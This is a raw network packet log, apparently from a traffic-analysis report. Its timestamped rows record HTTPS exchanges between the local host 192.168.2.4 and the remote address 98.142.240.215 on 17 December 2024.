                                                                                                                                                                              Dec 17, 2024 18:12:45.148809910 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:45.148883104 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:45.148890018 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:45.148929119 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:45.151842117 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:45.151916981 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:45.151925087 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:45.151962996 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:45.154154062 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:45.154225111 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:45.154233932 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:45.154273987 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:45.156698942 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:45.156785965 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:45.156793118 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:45.156833887 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:45.158863068 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:45.158965111 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:45.158973932 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:45.159013033 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:45.161289930 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:45.161375046 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:45.161396027 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:45.161458969 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:45.163472891 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:45.163548946 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:45.163557053 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:45.163598061 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:45.165786028 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:45.165868044 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:45.165874958 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:45.165919065 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:45.322781086 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:45.322946072 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:45.322973967 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:45.323035002 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:45.324671984 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:45.324764013 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:45.324770927 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:45.324815989 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:45.326951981 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:45.327060938 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:45.327068090 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:45.327109098 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:45.330154896 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:45.330240011 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:45.330246925 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:45.330288887 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:45.331759930 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:45.331835032 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:45.331841946 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:45.331882954 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:45.334791899 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:45.334877014 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:45.334883928 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:45.334925890 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:45.336328983 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:45.336411953 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:45.336421967 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:45.336464882 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:45.338654041 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:45.338731050 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:45.338737011 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:45.338778019 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:45.341754913 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:45.341845036 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:45.341851950 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:45.341893911 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:45.343358040 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:45.343446016 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:45.343452930 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:45.343494892 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:45.345685959 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:45.345772982 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:45.345779896 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:45.345824957 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:45.348804951 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:45.348882914 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:45.348891020 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:45.348929882 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:45.351119041 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:45.351210117 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:45.351217031 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:45.351340055 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:45.353622913 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:45.353705883 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:45.353712082 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:45.353754044 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:45.355751991 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:45.355829000 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:45.355838060 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:45.355878115 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:45.358109951 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:45.358194113 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:45.358200073 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:45.358242035 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:45.514781952 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:45.514945030 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:45.514961958 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:45.515021086 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:45.516611099 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:45.516725063 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:45.516731024 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:45.516782999 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:45.519694090 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:45.519776106 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:45.519789934 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:45.519829035 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:45.522228956 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:45.522310019 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:45.522316933 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:45.522356033 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:45.523968935 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:45.524048090 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:45.524055004 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:45.524260998 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:45.527247906 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:45.527327061 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:45.527335882 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:45.527483940 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:45.529227018 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:45.529300928 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:45.529308081 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:45.529344082 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:45.530544996 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:45.530608892 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:45.530615091 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:45.530651093 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:45.533639908 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:45.533706903 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:45.533714056 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:45.533761024 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:45.536024094 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:45.536087990 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:45.536093950 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:45.536129951 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:45.537463903 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:45.537532091 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:45.537539005 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:45.537574053 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:45.540565014 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:45.540630102 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:45.540636063 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:45.540672064 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:45.543040991 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:45.543103933 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:45.543108940 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:45.543148041 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:45.545519114 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:45.545603991 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:45.545609951 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:45.545646906 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:45.547642946 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:45.547719955 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:45.547725916 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:45.547768116 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:45.549973965 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:45.550050020 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:45.550055027 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:45.550096989 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:45.706712008 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:45.706835985 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:45.706866026 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:45.706908941 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:45.708991051 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:45.709068060 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:45.709075928 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:45.709114075 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:45.711390018 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:45.711457014 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:45.711464882 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:45.711503029 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:45.713892937 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:45.713960886 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:45.713968992 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:45.714004993 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:45.715996027 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:45.716067076 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:45.716073990 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:45.716109991 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:45.718339920 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:45.718409061 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:45.718415022 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:45.718451023 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:45.720753908 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:45.720813990 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:45.720819950 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:45.720855951 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:45.722980976 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:45.723048925 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:45.723054886 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:45.723090887 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:45.725353003 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:45.725416899 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:45.725421906 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:45.725457907 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:45.727742910 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:45.727813005 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:45.727818966 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:45.727854013 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:45.729947090 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:45.730011940 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:45.730016947 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:45.730051994 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:45.732315063 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:45.732378006 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:45.732383013 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:45.732415915 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:45.736160040 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:45.736224890 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:45.736231089 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:45.736265898 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:45.738500118 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:45.738564014 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:45.738569975 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:45.738605022 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:45.740827084 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:45.740894079 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:45.740900040 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:45.740932941 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:45.743124962 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:45.743190050 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:45.743196011 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:45.743227005 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:45.899039984 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:45.899188042 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:45.899276972 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:45.899342060 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:45.901890039 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:45.901993036 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:45.902010918 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:45.902070045 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:45.904791117 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:45.904892921 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:45.904910088 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:45.904963017 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:45.906203985 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:45.906322002 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:45.906338930 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:45.906395912 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:45.909054995 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:45.909184933 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:45.909200907 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:45.909260988 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:45.910337925 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:45.910432100 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:45.910448074 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:45.910506010 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:45.912987947 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:45.913084984 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:45.913100958 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:45.913158894 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:45.916156054 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:45.916254997 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:45.916271925 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:45.916330099 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:45.918103933 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:45.918205976 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:45.918220043 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:45.918270111 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:45.920059919 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:45.920140982 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:45.920156002 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:45.920206070 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:45.923167944 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:45.923279047 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:45.923295021 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:45.923352957 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:45.925446033 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:45.925537109 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:45.925551891 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:45.925606966 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:45.927874088 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:45.927953005 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:45.927968025 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:45.928036928 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:45.930047035 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:45.930130005 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:45.930145025 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:45.930212975 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:45.932449102 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:45.932535887 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:45.932560921 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:45.932612896 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:45.935518026 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:45.935672998 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:45.935688972 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:45.935760021 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:46.091022015 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:46.091136932 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:46.091161013 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:46.091213942 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:46.093708038 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:46.093785048 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:46.093791962 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:46.093831062 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:46.096025944 CET4434973198.142.240.215192.168.2.4
